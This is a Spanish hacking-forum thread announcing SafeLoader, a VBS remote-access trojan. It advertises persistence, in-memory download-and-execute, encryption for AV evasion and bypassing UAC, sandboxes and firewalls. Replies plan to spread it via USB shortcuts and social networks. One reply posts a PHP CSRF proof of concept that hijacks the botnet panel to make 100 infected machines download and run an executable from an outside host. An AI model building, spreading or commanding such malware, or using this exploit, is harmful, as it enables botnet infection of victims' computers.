Lo primero de todo, aclarar que SafeLoader es una herramienta de Administración Remota OPEN SOURCE creada para su analisis y estudio, no me hago responsable del mal uso que puedan darle.

Esta Versión es una Traducción de la V1 a Visual Basic Script, el Panel no se ha modificado Practicamente, solo se simplifico y corrigió algún fallo, respecto al Server, se añadieron mas metodos de StartUP y se trató de dejar el menor rastro posible en el Uninstall.

Image: Scan:

Mostrar/Ocultar

Features:
-Coded in VBS (Work in All Windows)
-Anti-Track Panel
-Easy to Install
-All Traffic is Encrypted
-StartUP with Startup Folders
-StartUP with Regedit
-Startup with Windows Tasks
-GeoLocation with GeoIP
-VBS Downloader and Load in Memory
-Stable Update
-Full Uninstall
-Small Size (8Kb)
-Easy Cryptable
-Fuck UAC, SandBox and Firewall


Credits:
-MadAntrax (Puse dos de tus StartUP's)
-Strup (Por traducir el cifrado a PHP) <3
-Houdini (Me base en el H-Worm, aunque da Pena y Dolor leerlo.)


Download:
[Enlace externo eliminado para invitados]


PD: Eso es todo, recuerden que es una Versión Beta, y aun le queda mucho por mejorar, asi que comuniquen cualquier error.

PD2: Proxima Versión sera Polimorfica.

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
estoy deseando ya ver como quedara la full, por eso de que lo detecten 2 es lo de menos, cada vez hay mas cifradores de vbs's, un gusto ver como a crecido el proyecto un saludo maquina y enhorabuena por el proyecto
Abolición para el torneo del toro de la vega. Death to the murderers of bulls.
Está genial, ya te lo dije en otro mensaje :P

A ver que funciones más le pones! jeje. Si necesitas ayuda o ideas con el spread me avisas, que yo en eso tengo la mano rota
My skype: madantrax.vbs
MadAntrax escribió:Está genial, ya te lo dije en otro mensaje :P

A ver que funciones más le pones! jeje. Si necesitas ayuda o ideas con el spread me avisas, que yo en eso tengo la mano rota
Jaja, espero que el Spread USB por .lnk no de problemas, por lo demas, usare tus Spreads de Twitter y Facebook, traducire uno de DropBox y usare otro que tengo por aqui de Skype.

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Que raro que no hayas caido en la tipica vulnerabilidad de CSRF(Accion ilegitima).

Poc php(para enviar consulta a 100 bots por ejemplo, y bajarles nuestro regalo.)

Código: Seleccionar todo

<?php
//Matabarras , CSRF Botnet SafeLoader.
$url = "merobancabrones.com";// url de la botnet.

$form["command"] = "downexec";
$form["value"] = "http://miverga.com/terobogil.exe";
$form["amount"] = 100;//100 boots(?)

echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/includes/send_command.php" method="POST">';
foreach($form As $key=>$value) {
	echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>
Si analizan y ven donde esta el panel,y el admin se come el csrf(se camufla facil aunque lo deje así para que veas, como realiza la accion nada mas entrando a ese php xd.)

Estaria bien que uses algun token, o referer.

Saludos y espero que en la proxima version este arreglado
Responder

Volver a “Troyanos y Herramientas”